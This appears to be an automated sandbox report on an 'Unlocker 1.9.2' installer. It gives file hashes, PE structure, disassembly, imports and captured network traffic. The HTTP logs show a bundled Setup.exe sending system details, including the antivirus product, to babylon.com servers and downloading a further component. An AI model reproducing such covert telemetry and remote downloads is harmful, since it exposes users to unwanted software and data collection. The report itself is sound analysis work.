                                                                                                                                                            Preview:L..................F.... ....ZJ.}...HQ.V.B...ZJ.}...........................u....P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.QV.`....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....Z.1.....QV.`..Unlocker..B......QV.`QV.`....T}.....................3$.U.n.l.o.c.k.e.r.....`.2......>.. .README.TXT..F......>..QV.`..............................R.E.A.D.M.E...T.X.T.......S...............-.......R...........N.9......C:\Program Files\Unlocker\README.TXT..<.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.\.R.E.A.D.M.E...T.X.T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.`.......X.......841675...........!a..%.H.VZAj....#r.h............!a..%.H.VZAj....#r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Jan 9 23:32:34 2013, mtime=Fri Feb 17 11:06:59 2023, atime=Wed Jan 9 23:32:34 2013, length=124928, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):889
                                                                                                                                                            Entropy (8bit):4.49012432326617
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8mCLbBYXzhzHbdpF4yfgrOPeZYIjEjA+2bdpMxAxQbdpMx8wl5ceuceMBm:8mCCbd1veZvUA3d+iid+qwAebeMBm
                                                                                                                                                            MD5:3CC2AF61EC12B3938A7778F07186A468
                                                                                                                                                            SHA1:8C4F7BCF21A64261CFF3F98ED0F7DB9E1833889B
                                                                                                                                                            SHA-256:638ABA2B34BE993604D1DAE84D06FFD05FCAF0EBA15C6DB21E2A8EACBA960B96
                                                                                                                                                            SHA-512:81DB14E13F06585C40459183A6450D52C329D92453CE4845ECC961ECF96AFB35CC7D507179D491F73546DE09ACA2B3751105D9F977C9C2C61655939AF004F1E9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):593
                                                                                                                                                            Entropy (8bit):2.7913299530091704
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:4xtCl0TMl//A9LY/dlrtmlXP/lGMy0fK1KRSAtSbdlrMrl6HRSAVlubdlrMrlF:8wl0TkXXdpsFFK4qbdpMxEsbdpMxF
                                                                                                                                                            MD5:2D83A59CB7C11AA6B7801CEF69A0B189
                                                                                                                                                            SHA1:D1CE98D8A3B9CDA21A97A4B9641E9E29C645C458
                                                                                                                                                            SHA-256:130A70D4025BE067A40B01F45C996A915E78CAF01CA0AA08BF56DD13F718252E
                                                                                                                                                            SHA-512:DD758D1D281C4FB8D96480A1FE90723C940497170E215589ED50B7B8D3DB1610F313D5696C629CC0DEFE8BB403CD4D49F5BF458152FCFE9AE25430C3A9BE2BAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Fri Feb 17 11:07:01 2023, mtime=Fri Feb 17 11:07:01 2023, atime=Fri Feb 17 11:07:01 2023, length=56, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):889
                                                                                                                                                            Entropy (8bit):4.512564864647671
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8mOBYXzhzHbdpF4yfgrefK9ah3BjEjA+8SbdpMxAxrbdpMx8wl55eu5eMBm:8mrbd1O9ahxUAGd+iBd+qwVeaeMBm
                                                                                                                                                            MD5:67BCAE80E3004F1647DE862D79F81281
                                                                                                                                                            SHA1:F5DDE93DD152B5CFCD2F8510D8E01D65CFC6B9B3
                                                                                                                                                            SHA-256:A16C718FE9115FF39A1D71AF54FB11224B30352B580CD55A3BB0E59EFAC924ED
                                                                                                                                                            SHA-512:5D52B3EE731D7E8B4B9DBAF7B7DDF16C5A165362F4C10422B6475C0317E5825D52957139402880511D00A0C679C8B8D1B1E26B5CB49CF070A777FF41FFF11970
                                                                                                                                                            Malicious:false
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Entropy (8bit):7.958432599476033
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:Unlocker1.9.2.exe
                                                                                                                                                            File size:1078591
                                                                                                                                                            MD5:1e02d6aa4a199448719113ae3926afb2
                                                                                                                                                            SHA1:f1eff6451ced129c0e5c0a510955f234a01158a0
                                                                                                                                                            SHA256:fb6b1171776554a808c62f4045f5167603f70bf7611de64311ece0624b365397
                                                                                                                                                            SHA512:7d0f1416beb8c141ee992fe594111042309690c00741dff8f9f31b4652ed6a96b57532780e3169391440076d7ace63966fab526a076adcdc7f7ab389b4d0ff98
                                                                                                                                                            SSDEEP:24576:eLMeYSiGTpTLDxxwqQcqOj5eyHox6ZGmAuXE7ZBlbT:+PbVvwqQpoLHontDrlbT
                                                                                                                                                            TLSH:C235231333E1E96AC1190B70A7DBD7B62772F3E22319874B7B0443AB5C252096F21E95
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........
                                                                                                                                                            Icon Hash:a2a0b496b2caca72
                                                                                                                                                            Entrypoint:0x4030cb
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:7fa974366048f9c551ef45714595665e
                                                                                                                                                            Instruction
                                                                                                                                                            sub esp, 00000180h
                                                                                                                                                            push ebx
                                                                                                                                                            push ebp
                                                                                                                                                            push esi
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            push edi
                                                                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                                                                            mov dword ptr [esp+10h], 00409160h
                                                                                                                                                            xor esi, esi
                                                                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                                                                            call dword ptr [00407030h]
                                                                                                                                                            push 00008001h
                                                                                                                                                            call dword ptr [004070B0h]
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [0040727Ch]
                                                                                                                                                            push 00000008h
                                                                                                                                                            mov dword ptr [00423F38h], eax
                                                                                                                                                            call 00007FEA28D1BAA6h
                                                                                                                                                            mov dword ptr [00423E84h], eax
                                                                                                                                                            push ebx
                                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                                            push 00000160h
                                                                                                                                                            push eax
                                                                                                                                                            push ebx
                                                                                                                                                            push 0041F430h
                                                                                                                                                            call dword ptr [00407158h]
                                                                                                                                                            push 00409154h
                                                                                                                                                            push 00423680h
                                                                                                                                                            call 00007FEA28D1B759h
                                                                                                                                                            call dword ptr [004070ACh]
                                                                                                                                                            mov edi, 00429000h
                                                                                                                                                            push eax
                                                                                                                                                            push edi
                                                                                                                                                            call 00007FEA28D1B747h
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [0040710Ch]
                                                                                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                                                                                            mov dword ptr [00423E80h], eax
                                                                                                                                                            mov eax, edi
                                                                                                                                                            jne 00007FEA28D18EBCh
                                                                                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                                                                                            mov eax, 00429001h
                                                                                                                                                            push dword ptr [esp+14h]
                                                                                                                                                            push eax
                                                                                                                                                            call 00007FEA28D1B23Ah
                                                                                                                                                            push eax
                                                                                                                                                            call dword ptr [0040721Ch]
                                                                                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                                                                                            jmp 00007FEA28D18F15h
                                                                                                                                                            cmp cl, 00000020h
                                                                                                                                                            jne 00007FEA28D18EB8h
                                                                                                                                                            inc eax
                                                                                                                                                            cmp byte ptr [eax], 00000020h
                                                                                                                                                            je 00007FEA28D18EACh
                                                                                                                                                            cmp byte ptr [eax], 00000022h
                                                                                                                                                            mov byte ptr [eax+eax+00h], 00000000h
                                                                                                                                                            Programming Language:
                                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e000 | 0x5868 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x58d2 | 0x5a00 | False | 0.665234375 | data | 6.4331003482809646 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.179763757809345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af78 | 0x400 | False | 0.55078125 | data | 4.617802320695973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0xa000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e000 | 0x5868 | 0x5a00 | False | 0.15108506944444444 | data | 3.417266606112887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_BITMAP | 0x2ea78 | 0x666 | Device independent bitmap graphic, 96 x 16 x 8, image size 1538, resolution 2868 x 2868 px/m, 15 important colors | English | United States |
| RT_ICON | 0x2f0e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States |
| RT_ICON | 0x2f988 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States |
| RT_DIALOG | 0x2fef0 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x2ffa8 | 0x120 | data | English | United States |
| RT_DIALOG | 0x300c8 | 0x118 | data | English | United States |
| RT_DIALOG | 0x301e0 | 0x202 | data | English | United States |
| RT_DIALOG | 0x303e8 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x304e0 | 0xee | data | English | United States |
| RT_DIALOG | 0x305d0 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x30688 | 0x120 | data | English | United States |
| RT_DIALOG | 0x307a8 | 0x118 | data | English | United States |
| RT_DIALOG | 0x308c0 | 0x202 | data | English | United States |
| RT_DIALOG | 0x30ac8 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x30bc0 | 0xee | data | English | United States |
| RT_DIALOG | 0x30cb0 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x30d68 | 0x120 | data | English | United States |
| RT_DIALOG | 0x30e88 | 0x118 | data | English | United States |
| RT_DIALOG | 0x30fa0 | 0x202 | data | English | United States |
| RT_DIALOG | 0x311a8 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x312a0 | 0xee | data | English | United States |
| RT_DIALOG | 0x31390 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x31448 | 0x120 | data | English | United States |
| RT_DIALOG | 0x31568 | 0x118 | data | English | United States |
| RT_DIALOG | 0x31680 | 0x202 | data | English | United States |
| RT_DIALOG | 0x31888 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x31980 | 0xee | data | English | United States |
| RT_DIALOG | 0x31a70 | 0xac | data | English | United States |
| RT_DIALOG | 0x31b20 | 0x118 | data | English | United States |
| RT_DIALOG | 0x31c38 | 0x110 | data | English | United States |
| RT_DIALOG | 0x31d48 | 0x1fa | data | English | United States |
| RT_DIALOG | 0x31f48 | 0xf0 | data | English | United States |
| RT_DIALOG | 0x32038 | 0xe6 | data | English | United States |
| RT_DIALOG | 0x32120 | 0xa0 | data | English | United States |
| RT_DIALOG | 0x321c0 | 0x10c | data | English | United States |
| RT_DIALOG | 0x322d0 | 0x104 | data | English | United States |
| RT_DIALOG | 0x323d8 | 0x1ee | data | English | United States |
| RT_DIALOG | 0x325c8 | 0xe4 | data | English | United States |
| RT_DIALOG | 0x326b0 | 0xda | data | English | United States |
| RT_DIALOG | 0x32790 | 0xa0 | data | English | United States |
| RT_DIALOG | 0x32830 | 0x10c | data | English | United States |
| RT_DIALOG | 0x32940 | 0x104 | data | English | United States |
| RT_DIALOG | 0x32a48 | 0x1ee | data | English | United States |
| RT_DIALOG | 0x32c38 | 0xe4 | data | English | United States |
| RT_DIALOG | 0x32d20 | 0xda | data | English | United States |
| RT_DIALOG | 0x32e00 | 0xa4 | data | English | United States |
| RT_DIALOG | 0x32ea8 | 0x110 | data | English | United States |
| RT_DIALOG | 0x32fb8 | 0x108 | data | English | United States |
| RT_DIALOG | 0x330c0 | 0x1f2 | data | English | United States |
| RT_DIALOG | 0x332b8 | 0xe8 | data | English | United States |
| RT_DIALOG | 0x333a0 | 0xde | data | English | United States |
| RT_GROUP_ICON | 0x33480 | 0x22 | data | English | United States |
| RT_MANIFEST | 0x334a8 | 0x3be | XML 1.0 document, ASCII text, with very long lines (958), with no line terminators | English | United States |
| DLL | Import |
|---|---|
| KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Feb 17, 2023 13:06:59.874687910 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8 |
| Feb 17, 2023 13:06:59.901247025 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4 |
| Feb 17, 2023 13:06:59.995367050 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8 |
| Feb 17, 2023 13:07:00.024701118 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4 |
| Feb 17, 2023 13:07:00.306576967 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8 |
| Feb 17, 2023 13:07:00.328727961 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Feb 17, 2023 13:06:59.874687910 CET | 192.168.2.4 | 8.8.8.8 | 0x2e37 | Standard query (0) | stat.info-stream.net | A (IP address) | IN (0x0001) | false |
| Feb 17, 2023 13:06:59.995367050 CET | 192.168.2.4 | 8.8.8.8 | 0x254f | Standard query (0) | stp.babylon.com | A (IP address) | IN (0x0001) | false |
| Feb 17, 2023 13:07:00.306576967 CET | 192.168.2.4 | 8.8.8.8 | 0xa6c1 | Standard query (0) | dl.babylon.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Feb 17, 2023 13:06:59.901247025 CET | 8.8.8.8 | 192.168.2.4 | 0x2e37 | No error (0) | stat.info-stream.net | stat.babylon-services.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Feb 17, 2023 13:06:59.901247025 CET | 8.8.8.8 | 192.168.2.4 | 0x2e37 | No error (0) | stat.babylon-services.com | | 184.154.27.232 | A (IP address) | IN (0x0001) | false |
| Feb 17, 2023 13:07:00.024701118 CET | 8.8.8.8 | 192.168.2.4 | 0x254f | No error (0) | stp.babylon.com | stp.babylon-services.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Feb 17, 2023 13:07:00.024701118 CET | 8.8.8.8 | 192.168.2.4 | 0x254f | No error (0) | stp.babylon-services.com | | 184.154.27.232 | A (IP address) | IN (0x0001) | false |
| Feb 17, 2023 13:07:00.328727961 CET | 8.8.8.8 | 192.168.2.4 | 0xa6c1 | No error (0) | dl.babylon.com | dl.babylon-services.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Feb 17, 2023 13:07:00.328727961 CET | 8.8.8.8 | 192.168.2.4 | 0xa6c1 | No error (0) | dl.babylon-services.com | | 198.143.175.67 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                            • stat.info-stream.net
                                                                                                                                                            • stp.babylon.com
                                                                                                                                                            • dl.babylon.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49695 | 184.154.27.232 | 80 | C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
Timestamp | kBytes transferred | Direction | Data
Feb 17, 2023 13:07:00.039767027 CET | 91 | OUT | GET /report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stat.info-stream.net
                                                                                                                                                            Cache-Control: no-cache
Feb 17, 2023 13:07:00.159986973 CET | 92 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 12:07:00 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                            Data Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                            Data Ascii: 2bGIF89a!,D;
Feb 17, 2023 13:07:00.160046101 CET | 93 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49696 | 184.154.27.232 | 80 | C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
Timestamp | kBytes transferred | Direction | Data
Feb 17, 2023 13:07:00.152195930 CET | 92 | OUT | GET /downloader.php?ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&lang=en&zpb=1&geo=1 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stp.babylon.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Cookie: affilID=122471
Feb 17, 2023 13:07:00.272099018 CET | 93 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 15:09:02 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Set-Cookie: affilID=deleted; expires=Thu, 17-Feb-2022 15:09:01 GMT; path=/; domain=.babylon.com
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Keep-Alive: timeout=1, max=100
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 31 31 32 0d 0a 21 2d 74 72 6b 49 6e 66 6f 3d 5b 54 54 79 70 65 3a 35 30 31 32 5f 37 5d 3b 23 44 51 30 42 57 51 46 64 34 6e 47 4e 69 59 47 5a 69 59 47 45 46 59 6a 59 67 4e 67 46 69 46 69 59 47 5a 6b 59 48 5a 26 33 69 6b 68 51 33 74 77 6a 50 76 4f 4b 53 48 41 58 39 6e 4c 78 30 32 32 67 66 52 7a 26 33 57 41 58 39 78 4c 53 63 45 74 75 6b 78 4b 54 69 34 68 49 46 26 64 4b 38 54 4b 43 4b 78 4a 77 63 78 35 77 63 42 67 45 77 69 4a 32 72 75 78 4d 41 30 50 63 56 4c 51 3b 23 44 51 79 45 67 65 4a 78 6a 59 6d 42 6d 59 6d 42 68 42 57 49 32 49 44 59 43 59 69 35 47 56 73 59 47 41 52 42 34 31 76 5a 38 49 67 41 57 35 51 51 67 3b 24 68 74 74 70 3a 2f 2f 64 6c 2e 62 61 62 79 6c 6f 6e 2e 63 6f 6d 2f 73 69 74 65 2f 66 69 6c 65 73 2f 53 65 74 75 70 39 2f 64 77 72 2f 6c 61 74 65 73 74 2f 6c 61 74 65 73 74 5f 62 6c 2f 53 65 74 75 70 32 2e 7a 70 62 3b 0d 0a
                                                                                                                                                            Data Ascii: 112!-trkInfo=[TType:5012_7];#DQ0BWQFd4nGNiYGZiYGEFYjYgNgFiFiYGZkYHZ&3ikhQ3twjPvOKSHAX9nLx022gfRz&3WAX9xLScEtukxKTi4hIF&dK8TKCKxJwcx5wcBgEwiJ2ruxMA0PcVLQ;#DQyEgeJxjYmBmYmBhBWI2IDYCYi5GVsYGARB41vZ8IgAW5QQg;$http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;
Feb 17, 2023 13:07:00.272156000 CET | 93 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49697 | 198.143.175.67 | 80 | C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
Timestamp | kBytes transferred | Direction | Data
Feb 17, 2023 13:07:00.490586996 CET | 94 | OUT | GET /site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: dl.babylon.com
                                                                                                                                                            Connection: Keep-Alive
Feb 17, 2023 13:07:00.645375013 CET | 95 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.13.4
                                                                                                                                                            Date: Fri, 17 Feb 2023 12:07:00 GMT
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Content-Length: 3844
                                                                                                                                                            Last-Modified: Wed, 01 Oct 2014 12:08:35 GMT
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Keep-Alive: timeout=15
                                                                                                                                                            ETag: "542beec3-f04"
                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49698 | 184.154.27.232 | 80 | C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
Timestamp | kBytes transferred | Direction | Data
